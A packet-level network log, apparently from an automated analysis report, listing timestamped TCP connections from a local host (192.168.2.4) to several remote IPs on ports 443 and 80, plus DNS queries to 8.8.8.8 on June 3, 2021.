Jun 3, 2021 20:59:10.057403088 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.057619095 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.057709932 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.057817936 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.058567047 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.058638096 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.058708906 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.058758974 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.060050011 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.060091019 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.060097933 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.060129881 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.060136080 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.060169935 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.060179949 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.060211897 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.060214996 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.060250044 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.060252905 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.060297012 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.060298920 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.060343981 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.060345888 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.060381889 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.060389996 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.060424089 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.061070919 CEST	443	49761	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.061379910 CEST	443	49761	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.061500072 CEST	49761	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.061503887 CEST	443	49761	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.061531067 CEST	443	49761	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.061583996 CEST	49761	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.062458992 CEST	49761	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.064466000 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.064508915 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.064539909 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.064563036 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.065028906 CEST	443	49762	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.065390110 CEST	443	49762	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.065478086 CEST	49762	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.066114902 CEST	443	49762	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.067873955 CEST	443	49762	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.067965031 CEST	49762	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.068114042 CEST	49762	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.068595886 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.068634987 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.068670034 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.068691015 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.072819948 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.072864056 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.072901964 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.072925091 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.077025890 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.077078104 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.077127934 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.077152014 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.081146955 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.081199884 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.081238985 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.081264019 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.085340977 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.085397005 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.085397959 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.085439920 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.085441113 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.085480928 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.085484982 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.085524082 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.089466095 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.089502096 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.089565039 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.091337919 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.093655109 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.093684912 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.093723059 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.094341993 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.097836018 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.097866058 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.097918034 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.100322008 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.101950884 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.101969957 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.102015972 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.102035999 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.109894037 CEST	443	49761	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.115258932 CEST	443	49762	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:10.148459911 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.193846941 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:59.765369892 CEST	49784	80	192.168.2.4	34.95.62.189
Jun 3, 2021 20:59:59.765431881 CEST	49785	80	192.168.2.4	34.95.62.189
Jun 3, 2021 20:59:59.900626898 CEST	80	49784	34.95.62.189	192.168.2.4
Jun 3, 2021 20:59:59.900763988 CEST	49784	80	192.168.2.4	34.95.62.189
Jun 3, 2021 20:59:59.901681900 CEST	80	49785	34.95.62.189	192.168.2.4
Jun 3, 2021 20:59:59.901803970 CEST	49785	80	192.168.2.4	34.95.62.189
Jun 3, 2021 20:59:59.902120113 CEST	49784	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:00.037758112 CEST	80	49784	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:00.037966967 CEST	49784	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:00.040163040 CEST	49784	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:00.175673008 CEST	80	49784	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:00.351639986 CEST	49785	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:00.488822937 CEST	80	49785	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:00.488923073 CEST	49785	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:00.489948034 CEST	49785	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:00.625083923 CEST	80	49785	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:22.589695930 CEST	49786	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:22.589739084 CEST	49787	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:22.724419117 CEST	80	49786	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:22.724558115 CEST	49786	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:22.724711895 CEST	80	49787	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:22.724855900 CEST	49787	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:22.726501942 CEST	49786	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:22.861841917 CEST	80	49786	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:22.861974001 CEST	49786	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:22.862921953 CEST	49786	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:22.997545958 CEST	80	49786	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:23.109896898 CEST	49787	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:23.245356083 CEST	80	49787	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:23.245500088 CEST	49787	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:23.245876074 CEST	49787	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:23.380944014 CEST	80	49787	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:28.405086040 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 21:00:28.405359030 CEST	49762	443	192.168.2.4	151.101.1.44
Jun 3, 2021 21:00:28.405359030 CEST	49761	443	192.168.2.4	151.101.1.44
Jun 3, 2021 21:00:28.405627012 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 21:00:28.405647993 CEST	49759	443	192.168.2.4	87.248.118.22
Jun 3, 2021 21:00:28.408550024 CEST	49746	443	192.168.2.4	104.20.185.68
Jun 3, 2021 21:00:28.408648968 CEST	49747	443	192.168.2.4	104.20.185.68
Jun 3, 2021 21:00:28.450784922 CEST	443	49759	87.248.118.22	192.168.2.4
Jun 3, 2021 21:00:28.450896978 CEST	49759	443	192.168.2.4	87.248.118.22
Jun 3, 2021 21:00:28.450949907 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 21:00:28.451010942 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 21:00:28.452903032 CEST	443	49761	151.101.1.44	192.168.2.4
Jun 3, 2021 21:00:28.452925920 CEST	443	49762	151.101.1.44	192.168.2.4
Jun 3, 2021 21:00:28.452935934 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 21:00:28.452950954 CEST	443	49762	151.101.1.44	192.168.2.4
Jun 3, 2021 21:00:28.452965975 CEST	443	49761	151.101.1.44	192.168.2.4
Jun 3, 2021 21:00:28.452975988 CEST	443	49762	151.101.1.44	192.168.2.4
Jun 3, 2021 21:00:28.452990055 CEST	443	49761	151.101.1.44	192.168.2.4
Jun 3, 2021 21:00:28.453001976 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 21:00:28.453041077 CEST	49762	443	192.168.2.4	151.101.1.44
Jun 3, 2021 21:00:28.453073978 CEST	49761	443	192.168.2.4	151.101.1.44
Jun 3, 2021 21:00:28.453078032 CEST	49762	443	192.168.2.4	151.101.1.44
Jun 3, 2021 21:00:28.453084946 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 21:00:28.453087091 CEST	49761	443	192.168.2.4	151.101.1.44
Jun 3, 2021 21:00:28.453147888 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 21:00:28.453186989 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 21:00:28.454109907 CEST	443	49746	104.20.185.68	192.168.2.4
Jun 3, 2021 21:00:28.454196930 CEST	49746	443	192.168.2.4	104.20.185.68
Jun 3, 2021 21:00:28.454315901 CEST	443	49747	104.20.185.68	192.168.2.4
Jun 3, 2021 21:00:28.454379082 CEST	49747	443	192.168.2.4	104.20.185.68
Jun 3, 2021 21:00:41.489795923 CEST	49797	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:41.489821911 CEST	49796	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:41.624346972 CEST	80	49796	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:41.624460936 CEST	49796	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:41.624962091 CEST	80	49797	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:41.625273943 CEST	49797	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:41.628892899 CEST	49796	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:41.763910055 CEST	80	49796	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:41.764154911 CEST	49796	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:41.765094995 CEST	49796	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:41.899641037 CEST	80	49796	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:41.995559931 CEST	49797	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:42.131381989 CEST	80	49797	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:42.131881952 CEST	49797	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:42.131958008 CEST	49797	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:42.268714905 CEST	80	49797	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:45.071394920 CEST	49798	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:45.071636915 CEST	49799	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:45.206108093 CEST	80	49798	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:45.206146955 CEST	80	49799	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:45.206259966 CEST	49798	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:45.206315041 CEST	49799	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:45.206887960 CEST	49798	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:45.341928959 CEST	80	49798	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:45.342086077 CEST	49798	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:45.343250990 CEST	49798	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:45.477744102 CEST	80	49798	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:46.491177082 CEST	49799	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:52.864810944 CEST	49801	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:52.865742922 CEST	49802	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:52.999569893 CEST	80	49801	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:52.999687910 CEST	49801	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:53.000273943 CEST	80	49802	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:53.000375986 CEST	49802	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:53.028057098 CEST	49802	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:53.163319111 CEST	80	49802	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:53.163443089 CEST	49802	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:53.164541006 CEST	49802	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:00:53.299506903 CEST	80	49802	34.95.62.189	192.168.2.4
Jun 3, 2021 21:00:54.322585106 CEST	49801	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:04.412945032 CEST	49813	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:04.413381100 CEST	49814	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:04.548011065 CEST	80	49813	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:04.548242092 CEST	80	49814	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:04.548669100 CEST	49814	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:04.548670053 CEST	49813	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:04.549221992 CEST	49813	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:04.685482979 CEST	80	49813	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:04.686357975 CEST	49813	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:04.687938929 CEST	49813	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:04.822705984 CEST	80	49813	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:04.899730921 CEST	49814	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:05.035670996 CEST	80	49814	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:05.035811901 CEST	49814	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:05.037168026 CEST	49814	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:05.172173977 CEST	80	49814	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:07.506994963 CEST	49816	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:07.507164001 CEST	49815	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:07.642489910 CEST	80	49816	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:07.642626047 CEST	49816	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:07.643156052 CEST	80	49815	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:07.643311024 CEST	49815	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:07.643471003 CEST	49816	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:07.778673887 CEST	80	49816	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:07.778806925 CEST	49816	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:07.793277979 CEST	49816	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:07.928117990 CEST	80	49816	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:08.811232090 CEST	49815	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:15.625194073 CEST	49818	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:15.625293970 CEST	49817	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:15.760317087 CEST	80	49817	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:15.760349989 CEST	80	49818	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:15.760464907 CEST	49817	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:15.760904074 CEST	49818	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:15.778970957 CEST	49818	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:15.915235996 CEST	80	49818	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:15.915355921 CEST	49818	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:15.917454958 CEST	49818	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:16.054459095 CEST	80	49818	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:17.040677071 CEST	49817	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:27.210055113 CEST	49820	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:27.210192919 CEST	49819	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:27.237955093 CEST	49822	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:27.237956047 CEST	49821	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:27.344278097 CEST	80	49819	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:27.344438076 CEST	49819	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:27.345284939 CEST	80	49820	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:27.345396996 CEST	49820	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:27.353782892 CEST	49819	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:27.372756958 CEST	80	49821	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:27.372927904 CEST	49821	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:27.373166084 CEST	80	49822	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:27.373285055 CEST	49822	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:27.380574942 CEST	49821	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:27.488559961 CEST	80	49819	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:27.488838911 CEST	49819	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:27.491903067 CEST	49819	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:27.516978025 CEST	80	49821	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:27.517141104 CEST	49821	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:27.518152952 CEST	49821	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:27.626368999 CEST	80	49819	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:27.653109074 CEST	80	49821	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:28.607482910 CEST	49820	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:28.673250914 CEST	49822	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:29.814063072 CEST	49824	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:29.814079046 CEST	49823	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:29.950750113 CEST	80	49823	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:29.950890064 CEST	49823	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:29.950895071 CEST	80	49824	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:29.951040983 CEST	49824	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:29.952511072 CEST	49824	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:30.089883089 CEST	80	49824	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:30.089987040 CEST	49824	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:30.091326952 CEST	49824	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:30.226321936 CEST	80	49824	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:31.057729959 CEST	49823	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:38.638119936 CEST	49826	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:38.638209105 CEST	49825	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:38.773042917 CEST	80	49825	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:38.773087025 CEST	80	49826	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:38.773194075 CEST	49825	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:38.773247004 CEST	49826	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:38.796308994 CEST	49825	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:38.931354046 CEST	80	49825	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:38.931483984 CEST	49825	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:38.933660030 CEST	49825	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:39.069977999 CEST	80	49825	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:40.060734034 CEST	49826	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:49.756335974 CEST	49827	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:49.764467955 CEST	49828	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:49.890767097 CEST	80	49827	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:49.890892029 CEST	49827	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:49.892219067 CEST	49827	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:49.899684906 CEST	80	49828	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:49.899843931 CEST	49828	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:50.027240992 CEST	80	49827	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:50.027317047 CEST	49827	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:50.029278040 CEST	49827	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:50.034091949 CEST	49830	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:50.034188032 CEST	49829	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:50.163649082 CEST	80	49827	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:50.168677092 CEST	80	49830	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:50.168808937 CEST	49830	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:50.169059992 CEST	80	49829	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:50.169141054 CEST	49829	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:50.207803965 CEST	49829	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:50.343338966 CEST	80	49829	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:50.343455076 CEST	49829	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:50.344705105 CEST	49829	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:50.479607105 CEST	80	49829	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:51.060849905 CEST	49828	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:51.278083086 CEST	49831	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:51.413161993 CEST	80	49831	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:51.413269997 CEST	49831	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:51.420593023 CEST	49831	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:51.557261944 CEST	80	49831	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:51.557524920 CEST	49831	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:51.568429947 CEST	49831	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:01:51.703272104 CEST	80	49831	34.95.62.189	192.168.2.4
Jun 3, 2021 21:01:51.709132910 CEST	49830	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:02:01.125152111 CEST	49833	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:02:01.125220060 CEST	49832	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:02:01.261226892 CEST	80	49832	34.95.62.189	192.168.2.4
Jun 3, 2021 21:02:01.261257887 CEST	80	49833	34.95.62.189	192.168.2.4
Jun 3, 2021 21:02:01.261368990 CEST	49832	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:02:01.261403084 CEST	49833	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:02:01.277935028 CEST	49833	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:02:01.414328098 CEST	80	49833	34.95.62.189	192.168.2.4
Jun 3, 2021 21:02:01.414422989 CEST	49833	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:02:01.415782928 CEST	49833	80	192.168.2.4	34.95.62.189
Jun 3, 2021 21:02:01.550890923 CEST	80	49833	34.95.62.189	192.168.2.4
Jun 3, 2021 21:02:02.224716902 CEST	49832	80	192.168.2.4	34.95.62.189

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 3, 2021 20:58:26.847050905 CEST	65298	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:58:26.895441055 CEST	53	65298	8.8.8.8	192.168.2.4
Jun 3, 2021 20:58:27.068996906 CEST	59123	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:58:27.136136055 CEST	53	59123	8.8.8.8	192.168.2.4
Jun 3, 2021 20:58:27.499844074 CEST	54531	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:58:27.554400921 CEST	53	54531	8.8.8.8	192.168.2.4
Jun 3, 2021 20:58:28.404438972 CEST	49714	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:58:28.454715967 CEST	53	49714	8.8.8.8	192.168.2.4
Jun 3, 2021 20:58:29.313869953 CEST	58028	53	192.168.2.4	8.8.8.8
Jun 3, 2021 20:58:29.362179995 CEST	53	58028	8.8.8.8	192.168.2.4
